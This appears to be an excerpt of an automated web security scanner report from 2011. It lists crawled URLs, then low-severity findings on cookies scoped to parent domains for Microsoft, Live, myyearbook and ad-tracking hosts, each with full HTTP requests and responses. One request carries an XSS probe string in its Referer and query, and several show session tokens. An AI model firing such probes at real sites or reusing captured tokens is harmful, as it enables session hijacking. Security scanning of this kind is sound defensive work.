http://pix04.revsci.net/J08778/b3/0/3/1008211/347187000.js
http://pix04.revsci.net/J08778/b3/0/3/1008211/435975349.js
http://pix04.revsci.net/J08778/b3/0/3/1008211/674742100.js
http://pixel.33across.com/ps/
http://pixel.quantserve.com/pixel
http://pixel.quantserve.com/pixel/p-c9d_b-0iR8pjg.gif
http://profile.live.com/Handlers/Plt.mvc
http://profile.live.com/favicon.ico
http://r.openx.net/set
http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/772053252
http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/
http://rd.apmebf.com/w/get.media
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233
http://rs.gwallet.com/r1/pixel/x960r=772053252
http://rt.legolas-media.com/lgrt
http://sales.liveperson.net/hc/54909046/
http://secure.adnxs.com/seg
http://segment-pixel.invitemedia.com/pixel
http://segment-pixel.invitemedia.com/set_partner_uid
http://segments.adap.tv/data
http://segments.adap.tv/data/
https://servicing.capitalone.com/c1/login.aspx
http://showadsak.pubmatic.com/AdServer/AdServerServlet
http://sitelife.boston.com/ver1.0/Direct/Jsonp
http://social.msdn.microsoft.com/Search/en-US
http://social.msdn.microsoft.com/search/en-US/en-USebb6e
http://sync.adap.tv/sync
http://sync.mathtag.com/sync/img
http://tags.bluekai.com/ids
http://tags.bluekai.com/site/2731
http://tags.bluekai.com/site/2751
http://tags.bluekai.com/site/365
http://uat.netmng.com/pixel/
http://user.lucidmedia.com/clicksense/user
http://user.lucidmedia.com/clicksense/user/browser
http://vap2den1.lijit.com/www/delivery/lg.php
http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/
http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description
http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView
http://visualstudiogallery.msdn.microsoft.com/globalresources/scripts/ms2.js
http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula
http://visualstudiogallery.msdn.microsoft.com/site/favorites
http://visualstudiogallery.msdn.microsoft.com/site/search
http://www.bing.com/fd/ls/l
http://www.bing.com/search
http://www.burstnet.com/enlightn/8117//3E06/
http://www.burstnet.com/enlightn/8171//99D2/
http://www.capitalone.com/autoloans/before-you-apply.php
http://www.capitalone.com/autoloans/redirect.php
http://www.capitalone.com/directbanking/
http://www.capitalone.com/directbanking/online-savings-accounts/interestplus-online-savings-account/open-account/
http://www.capitalone.com/redirect.php
http://www.capitalone.com/stylesheets/https-common/header.css
http://www.othersonline.com/partner/scripts/myyearbook/alice.js
http://www.othersonline.com/partner/scripts/myyearbook/page_parser.js
http://www.wtp101.com/pull_sync

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

10.1. http://c.microsoft.com/trans_pixel.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://c.microsoft.com
Path:	/trans_pixel.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=a249f876-00b8-4c5d-9c21-de037b2ac7b6&Microsoft.CreationDate=07/21/2011 17:35:34&Microsoft.LastVisitDate=07/21/2011 17:35:35&Microsoft.NumberOfVisits=2&SessionCookie.Id=8398488F0DFE43145C0E05E22527CE9C; domain=microsoft.com; expires=Thu, 21-Jul-2011 18:05:35 GMT; path=/
MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/21/2011 17:35:35&Microsoft.VisitStartDate=07/21/2011 17:35:34&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=19&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; domain=microsoft.com; expires=Fri, 20-Jul-2012 17:35:35 GMT; path=/
MS0=218903b4e52846208d2f3155cff8d220; domain=.microsoft.com; expires=Thu, 21-Jul-2011 18:05:35 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trans_pixel.aspx?tz=-5&cs=1&ti=Virus%2C%20Spyware%20%26%20Malware%20Protection%20%7C%20Microsoft%20Security%20Essentials&r=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&ts=1311269739365&sr=1920x1200&bs=1023x733&ms.uridomain=www.microsoft.com&ms.uripath=%2Fen-us%2Fsecurity_essentials%2Fdefault.aspx&ms.uriquery=%3FbladeFlyout%3DShare%26f9857%2522%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253E256ae1bee6f%3D1&ms.interactiontype=0&ms.initial=0&ms.title=Virus%2C%20Spyware%20%26%20Malware%20Protection%20%7C%20Microsoft%20Security%20Essentials&ms.linkid=40-00-111SXX02972%3B40-00-111SXX02975%3B40-00-111SXX02976%3B40-00-111SXX02974&ms.ea_offer=Download-Product&ms.ea_name=One-click%20download HTTP/1.1
Host: c.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/security_essentials/default.aspx?bladeFlyout=Share&f9857%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E256ae1bee6f=1
Cookie: WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311258939342:ss=1311258939330; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/20/2011 22:17:59&Microsoft.VisitStartDate=07/20/2011 21:50:50&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=17&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet:1=:2=

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=a249f876-00b8-4c5d-9c21-de037b2ac7b6&Microsoft.CreationDate=07/21/2011 17:35:34&Microsoft.LastVisitDate=07/21/2011 17:35:35&Microsoft.NumberOfVisits=2&SessionCookie.Id=8398488F0DFE43145C0E05E22527CE9C; domain=microsoft.com; expires=Thu, 21-Jul-2011 18:05:35 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/21/2011 17:35:35&Microsoft.VisitStartDate=07/21/2011 17:35:34&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=19&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; domain=microsoft.com; expires=Fri, 20-Jul-2012 17:35:35 GMT; path=/
Set-Cookie: MS0=218903b4e52846208d2f3155cff8d220; domain=.microsoft.com; expires=Thu, 21-Jul-2011 18:05:35 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
Date: Thu, 21 Jul 2011 17:35:34 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

10.2. http://clients.mobilecause.com/lists/1227/subscriptions/web.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://clients.mobilecause.com
Path:	/lists/1227/subscriptions/web.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_mobile_cause_session_id=BAh7BjoPc2Vzc2lvbl9pZCIlNGZlMWM5MTdlOGRhMzFkMzk3ZDQ0ZmFlZDc1NWIwOTU%3D--1987dc38817defb510c73ffcd8bf69082a0bfa0b; domain=.mobilecause.com; path=/; expires=Sat, 06-Aug-2011 13:15:26 GMT; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lists/1227/subscriptions/web.js?height=300&width=400 HTTP/1.1
Host: clients.mobilecause.com
Proxy-Connection: keep-alive
Referer: http://www.seashepherd.org/popups/mobile-signup-lightbox/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 23 Jul 2011 13:15:26 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
ETag: "467619138121a141a1c5e91dcaf38c9d"
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-Runtime: 60
Set-Cookie: uniq_id=1311426926.44707; path=/
Set-Cookie: _mobile_cause_session_id=BAh7BjoPc2Vzc2lvbl9pZCIlNGZlMWM5MTdlOGRhMzFkMzk3ZDQ0ZmFlZDc1NWIwOTU%3D--1987dc38817defb510c73ffcd8bf69082a0bfa0b; domain=.mobilecause.com; path=/; expires=Sat, 06-Aug-2011 13:15:26 GMT; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 13842

document.write('<style type=\'text/css\'>\n#pe_list_1227.peWidget table, #pe_list_1227.peWidget caption, #pe_list_1227.peWidget tbody, #pe_list_1227.peWidget tfoot, #pe_list_1227.peWidget thead, #pe_l
...[SNIP]...

10.3. http://games.myyearbook.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://games.myyearbook.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
mcim=deleted; expires=Wed, 21-Jul-2010 18:00:14 GMT; path=/; domain=.myyearbook.com
meeboCIM672=deleted; expires=Wed, 21-Nov-3010 18:00:15 GMT; path=/; domain=.myyearbook.com
navbar-click=deleted; expires=Wed, 21-Jul-2010 18:00:14 GMT; path=/; domain=.myyearbook.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.4. http://games.myyearbook.com/landing/pool previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://games.myyearbook.com
Path:	/landing/pool

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
mcim=deleted; expires=Wed, 21-Jul-2010 18:41:28 GMT; path=/; domain=.myyearbook.com
meeboCIM672=deleted; expires=Wed, 21-Nov-3010 18:41:29 GMT; path=/; domain=.myyearbook.com
navbar-click=deleted; expires=Wed, 21-Jul-2010 18:41:28 GMT; path=/; domain=.myyearbook.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.5. http://hipservice.live.com/gethip.srf previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://hipservice.live.com
Path:	/gethip.srf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

HIPSession=41mWBOemPC4NZ9mfMNJAeqsJaqNNeXl*HshHpqa5B4vSZlDVTkGlFo4D5gXJ4tj8JD2vxoQ!ZeLZWAPWKE9iA1jWY!YWMvFRzag8kQV93cifQ$; domain=.live.com;path=/;version=1

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gethip.srf?id=251248&mkt=en-US&fr=Hard&fid=7cac2e94-9199-4f1d-acee-7c1b198d15e6 HTTP/1.1
Host: hipservice.live.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://home.live.com/search/hip?query=h02332
Cookie: mkt0=en-US; drua=9c9838e8e958effe-1; wlidperf=throughput=5&latency=2133; wla42=cHJveHktYmF5LnB2dC1jb250YWN0cy5tc24uY29tfGJ5MioxLDUxMEE5NzRFQ0I5NEZCMzAsMSwwLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMHwxLDlDOTgzOEU4RTk1OEVGRkUsMSwsMHwxLDY5RjQwMDJDN0I3OTUzQSwxLDAsMA==; E=P:xzld3wkXzog=:uoVRN0syE5kxDo+vkFVpJb+Rkc3YBaZQPLqSpPYggXI=:F; xid=5aa0c1fb-caa3-40df-b5b6-4e2e6656cc32&&SN2xxxxxC516&247; xidseq=7; wlv=A|_-d:s*UM6wBg.2+1+0+3; BP=l=SN.Profile&FR=&ST=; MUID=1FDD375D440B439987A467BECD35D2C6; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 19881
Content-Type: text/html; charset=utf-8
Expires: Sat, 23 Jul 2011 04:40:10 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Set-Cookie: HIPSession=41mWBOemPC4NZ9mfMNJAeqsJaqNNeXl*HshHpqa5B4vSZlDVTkGlFo4D5gXJ4tj8JD2vxoQ!ZeLZWAPWKE9iA1jWY!YWMvFRzag8kQV93cifQ$; domain=.live.com;path=/;version=1
PPServer: PPV: 30 H: BAYIDSHIPV1D04 V: 0
Date: Sat, 23 Jul 2011 04:41:10 GMT
Connection: close

var HIPM={name:"HIPM",innerFrame:null,comeinURLr:"",comeinURL:"",vv:"",eEmpty:"",eTooLong:"",eWrongAnswer:"",solutionElemt:"",afr:"audio",vfr:"visual",instruction:"",starttime:null,endtime:null,solnti
...[SNIP]...

10.6. http://home.myyearbook.com/Countries previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://home.myyearbook.com
Path:	/Countries

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Countries?callback=jsonp1311271115649 HTTP/1.1
Host: home.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:59:14 GMT
Server: Apache
Set-Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP COR CURa OUR STP UNI"
Expires: Fri, 22 Jul 2011 17:59:14 GMT
Etag: 9f473552c698ba499d3d80931d5520f2
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
X-MyPoolMember: 10.100.10.194
Content-Length: 9532

jsonp1311271115649({"countryList":[{"id":3,"code":"AF","name":"AFGHANISTAN"},{"id":4,"code":"AX","name":"ALAND ISLANDS"},{"id":5,"code":"AL","name":"ALBANIA"},{"id":6,"code":"DZ","name":"ALGERIA"},{"i
...[SNIP]...

10.7. http://home.myyearbook.com/feed/giftFeedItems previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://home.myyearbook.com
Path:	/feed/giftFeedItems

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feed/giftFeedItems?callback=jsonp1311271115651 HTTP/1.1
Host: home.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:59:49 GMT
Server: Apache
Set-Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
Expires: Thu, 21 Jul 2011 18:14:49 GMT
Last-Modified: Thu, 21 Jul 2011 17:55:05 GMT
Etag: f29e77150f489e96ebc486166f22b40d
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.10.201
Content-Length: 12231

hblFeed({"feed":"giftFeedItems","data":[{"age":0,"user_a":{"name":"Travis","profile":"http:\/\/www.myyearbook.com?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTE2Nzk0Mjc5","image":"hbl\/thm_thm_phpd
...[SNIP]...

10.8. http://home.myyearbook.com/feed/myMagFeedItems previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://home.myyearbook.com
Path:	/feed/myMagFeedItems

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feed/myMagFeedItems?callback=jsonp1311271115652 HTTP/1.1
Host: home.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:08 GMT
Server: Apache
Set-Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
Expires: Thu, 21 Jul 2011 18:15:08 GMT
Last-Modified: Thu, 21 Jul 2011 18:00:04 GMT
Etag: 1df6447e361f9befddab97c228cb2f4f
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.10.194
Content-Length: 8810

hblFeed({"feed":"myMagFeedItems","data":[{"age":1,"user":{"name":"Kaitlyn","profile":"http:\/\/www.myyearbook.com?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTE3MDEyNDY5","image":"hbl\/17012469.jpg
...[SNIP]...

10.9. http://home.myyearbook.com/feed/tvFeedItems previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://home.myyearbook.com
Path:	/feed/tvFeedItems

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feed/tvFeedItems?callback=jsonp1311271115650 HTTP/1.1
Host: home.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:59:34 GMT
Server: Apache
Set-Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
Expires: Thu, 21 Jul 2011 18:14:34 GMT
Last-Modified: Thu, 21 Jul 2011 17:55:05 GMT
Etag: a4a9da87a6541b75f3c44d08cee06097
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.10.193
Content-Length: 10935

hblFeed({"feed":"tvFeedItems","data":[{"age":4,"user":{"name":"Michelle","profile":"http:\/\/www.myyearbook.com?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTE5OTIzNDE2","image":"hbl\/19923416.jpg"}
...[SNIP]...

10.10. http://pixel.everesttech.net/2368/gr previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://pixel.everesttech.net
Path:	/2368/gr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

everest_session_v2=EsNOKHzlCnwAAAt2; path=/; domain=.everesttech.net
everest_g_v2=g_surferid~er9OKHxYa3AAAMko; path=/; domain=.everesttech.net; expires=Fri, 26-Jul-2030 06:09:51 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2368/gr?url=http%3a//www.everestjs.net/static/ad_if_c.html%23gck%3d__EFGCK__%26efck%3d__EFGSURFER__%26url%3dhttp%3a//tag.admeld.com&ev_gb=0&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=566&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: pixel.everesttech.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=6;sz=728x90;ord=707503625482983
Cookie: everest_g_v2=g_surferid~er9OKHxYa3AAAMko; everest_session_v2=EsNOKHzlCnwAAAt2

Response

HTTP/1.1 302 Found
Date: Thu, 21 Jul 2011 19:29:51 GMT
Server: Apache
Set-Cookie: everest_session_v2=EsNOKHzlCnwAAAt2; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~er9OKHxYa3AAAMko; path=/; domain=.everesttech.net; expires=Fri, 26-Jul-2030 06:09:51 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Location: http://www.everestjs.net/static/ad_if_c.html#gck=er9OKHxYa3AAAMko&efck=er9OKHxYa3AAAMko&url=http://tag.admeld.com
Content-Length: 305
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.everestjs.net/static/ad_if_c.html#gc
...[SNIP]...

10.11. http://pixel1350.everesttech.net/1350/p previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://pixel1350.everesttech.net
Path:	/1350/p

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

everest_session_v2=er9OKHxYa3AAAMko; path=/; domain=.everesttech.net
everest_g_v2=g_surferid~er9OKHxYa3AAAMko; path=/; domain=.everesttech.net; expires=Fri, 26-Jul-2030 06:02:01 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1350/p?ev_transid={7F47B713-0E8E-4DBF-9FCF-DB4D4104C2A4}&ev_pageview=1&ev_category_cat_pageview=1 HTTP/1.1
Host: pixel1350.everesttech.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:01 GMT
Server: Apache
Set-Cookie: everest_session_v2=er9OKHxYa3AAAMko; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~er9OKHxYa3AAAMko; path=/; domain=.everesttech.net; expires=Fri, 26-Jul-2030 06:02:01 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Vary: X-EF-Forwarded-For,Cookie,Host
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "37f8c14-80-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 128
Content-Type: image/png

.PNG
.
...IHDR.....................bKGD............. pHYs...........~.....tIME......).......IDATx.c````........E@....IEND.B`.

10.12. http://t.mookie1.com/t/v1/imp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://t.mookie1.com
Path:	/t/v1/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session=1311271309|1311271310; path=/; domain=.mookie1.com
id=4612530447660445644; path=/; expires=Tue, 14-Aug-12 18:01:50 GMT; domain=.mookie1.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=66&migSource=mmind&migTrackDataExt=5684521;2711514&migRandom=384387902233833&migTrackFmtExt=ad;pl HTTP/1.1
Host: t.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
